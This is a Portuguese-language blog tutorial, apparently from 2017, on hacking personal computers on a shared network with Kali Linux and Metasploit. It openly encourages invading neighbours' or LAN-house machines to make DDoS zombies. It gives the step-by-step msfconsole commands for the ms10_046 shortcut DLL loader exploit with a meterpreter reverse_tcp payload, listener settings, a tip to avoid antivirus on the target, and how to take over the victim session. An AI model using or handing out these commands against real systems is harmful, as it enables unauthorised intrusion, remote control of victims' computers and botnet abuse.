Escolar Documentos
Profissional Documentos
Cultura Documentos
hackear um computador com Kali Linux
Vamos invadir uns computadores por ai? Essa é a minha proposta! vamos aprender e invadir a
vontade, acho que a segurança na informação só vai ser levado mais a serio para os usuários
quando tudo começar a virar um caos.
Eu proponho invadir computadores pessoais e transformalos em zombies para fazer deles o que
bem intendermos. A segurança de informação é quase nula quando se fala de computador
pessoal, isso devido a falta de informação que muito usuários tem, muito acham que basta instalar
um antvirus e pronto, estamos seguros, mas a realidade pode ser bem diferente.
Vamos pensar em uma rede, uma rede fechado, quem sabe a de uma lan house ou a rede do seu
vizinho, você pode invadir o wifi dele (veja como fazer aqui) e a partir dai pegar as informaçães
que precisar.
Por que invadir um computador?
Entre os mais variados motivos pessoais, existem os motivos não pessoais, um computador
zombie pode servir para fazer ataques DDOS, ponte para outros ataques e nos mais variados
casos para dar views a um site.
O que é o Metasploit?
Metasploit Project é um projeto de segurança de computador que fornece informações sobre as
vulnerabilidades de segurança e auxiliares em testes de penetração e desenvolvimento.
Seu subprojeto mais conhecido é o de código aberto Metasploit Framework, uma ferramenta para
o desenvolvimento e execução de código de exploração contra uma máquina de destino remoto.
Outros subprojetos importantes incluem o Banco de Dados Opcode, arquivo shellcode e
pesquisas relacionadas.
O Metasploit Project é bem conhecida por suas ferramentas antiforenses e de evasão, algumas
das quais são incorporadas ao Metasploit Framework.
http://sobrecodigos.esy.es/comohackearumcomputadorutilizandoasferramentasdokalilinux/ 1/7
11/04/2017 como hackear um computador com Kali Linux
Como hackear um computador?
Para fazer a invasão no computador você vai precisar de alguns pré requisitos, eles vão facilitar a
invasão e transformar as coisas mais simples.
1. estar na mesma rede
2. utiliza e conhecer muito bem o framework metasploit
3. Kali linux (ou qualquer outra distro que tenha o metasploit)
Msfconsole é de longe a parte mais popular do Metasploit Framework, e por boas razões. É um
dos mais flexível, rico recursos.
Msfconsole fornece um prático tudoemum, interface para quase todas as opções; é como um
balcão único para todos os seus sonhos de exploração.
Para iniciar msfconsole, digite msfconsole na linha de comando
msfconsole
agora, depois de obter o prompt de MSF digite o comando abaixo e olhar para o módulo
de exploit/windows/browser/ms10_046_shortcut_icon_dllloader.
Aqui acima módulo explora uma vulnerabilidade na manipulação de arquivos do Windows de
atalho (.lnk) que contêm um recurso de ícone apontando para um malicioso DLL.Esse módulo cria
um serviço WebDAV que pode ser usado para executar um payload arbitrário quando acessado
como um caminho UNC.
http://sobrecodigos.esy.es/comohackearumcomputadorutilizandoasferramentasdokalilinux/ 2/7
11/04/2017 como hackear um computador com Kali Linux
Agora, uma vez que tenhamos encontrado o módulo desejado, vamos utilizar esta façanha,
digitando o comando a seguir.
msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
Agora, uma vez que a exploração é carregado vamos definir a carga útil para o acima
selecione exploit. Em nosso cenário estará usando payload TCP inversa. Digite o comando a
seguir para definir carga útil.
A carga útil é o código que queremos do sistema para executar, selecionado e entregue pelo
Framework. Um shell reverso é uma carga que cria uma ligação a partir do computador de destino
de volta para o atacante como um prompt de comando do Windows, enquanto uma shell
ligamento é uma carga que "Liga" uma linha de comandos para uma porta de escuta na máquina
de destino, que o atacante pode se conectar.
#msf > set payload windows/meterpreter/reverse_tcp
http://sobrecodigos.esy.es/comohackearumcomputadorutilizandoasferramentasdokalilinux/ 3/7
11/04/2017 como hackear um computador com Kali Linux
Agora é hora de fazer algumas configurações para o Exploit / carga útil que acabamos de definir.
digite o comando dado
#msf > show options
Você deve ficar abaixo de saída padrão.
Agora temos que definir o host local para ouvir. Digite o dado abaixo dois comandos.
#msf > set SRVHOST 192.168.31.20
http://sobrecodigos.esy.es/comohackearumcomputadorutilizandoasferramentasdokalilinux/ 4/7
11/04/2017 como hackear um computador com Kali Linux
Este será o seu IP HOST metasploit endereço de corrida.
#msf > set LHOST 192.168.31.20
Este será também o seu endereço de IP host executando metasploit.
Agora, verifique se a configuração do aplicado acima é aplicada.
#msf > show options
Agora, finalmente, vamos começar a explorar. Execute o comando Exploit.
http://sobrecodigos.esy.es/comohackearumcomputadorutilizandoasferramentasdokalilinux/ 5/7
11/04/2017 como hackear um computador com Kali Linux
#msf > exploit
Uma vez executado, devemos "Servidor Iniciado" (Certifiquese de que o servidor não está
executando qualquer serviço da web na porta 80)
Em qualquer máquina cliente simplesmente abrir o Internet Explorer e tentar abrir
http://192.168.31.20
Nota: ele vai dar o seu um popup pedindo a permissão, clique em Permitir e Certifiquese de que
você não tem nenhum antivírus em execução no PC de destino.
http://sobrecodigos.esy.es/comohackearumcomputadorutilizandoasferramentasdokalilinux/ 6/7
11/04/2017 como hackear um computador com Kali Linux
Você pode verificar o número de sessão conectada bem sucedido, executando os sessons de
comando no console do MSF.
Agora, como podemos ver que temos uma vítima ligada seu tempo para acessar o sistema.
executar a sessão de comando i 1.
#meterpeter > session i 1
Uma vez conectado comando tipo linux para navegar dentro do sistema e tem total controle sobre
ele.
http://sobrecodigos.esy.es/comohackearumcomputadorutilizandoasferramentasdokalilinux/ 7/7